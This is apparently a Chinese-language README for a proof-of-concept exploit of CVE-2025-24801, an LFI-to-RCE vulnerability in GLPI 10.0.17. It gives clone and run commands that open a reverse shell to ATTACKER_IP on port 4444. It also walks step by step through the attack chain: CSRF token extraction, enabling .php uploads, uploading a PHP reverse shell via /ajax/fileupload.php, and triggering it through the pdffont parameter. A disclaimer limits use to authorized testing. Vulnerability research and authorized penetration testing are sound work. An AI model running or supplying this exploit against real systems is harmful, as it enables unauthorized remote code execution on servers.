
CVE-2025-24801的概念验证利用,GLPI 10.0.17中的LFI到RCE漏洞。自动化登录、启用PHP上传,并上传反向shell用于授权安全测试。
本仓库包含一个概念验证脚本(poc.py),用于利用 GLPI 10.0.17 中的 LFI 到 RCE 漏洞(CVE-2025-24801)。它可以自动完成以下操作:
.php 上传git clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt
python3 poc.py \
--url https://target.example.com/glpi \
--user TECHNICIAN_USER \
--password "PASSWORD" \
--lhost ATTACKER_IP \
--lport 4444
--url:GLPI 实例的基础 URL(例如 https://example.com/glpi)--user / --password:有效的 GLPI 技术员凭据--lhost / --lport:攻击者 IP 和反向 shell 监听端口脚本默认自动使用 --doc-id 1 更新第一个文档类型。
执行后,脚本将:
.php 上传exploit.php随后您需要手动触发 LFI:在 PDF 字体包含中指定上传的文件名(例如通过报告导出功能),从而实现 RCE。
/front/login.php 提取 CSRF 令牌,并提交凭据进行身份验证。/front/documenttype.form.php?id=1,解析 CSRF 令牌,并将 php 添加到允许的扩展名列表中。/front/ticket.form.php 的 CSRF 令牌,然后使用 /ajax/fileupload.php(携带 X-Requested-With: XMLHttpRequest 头)上传 PHP 反向 shell。pdffont 参数。本工具仅用于授权的安全测试和教育目的。未经明确许可,请勿将其用于任何系统。
创建目的:教育和授权的渗透测试。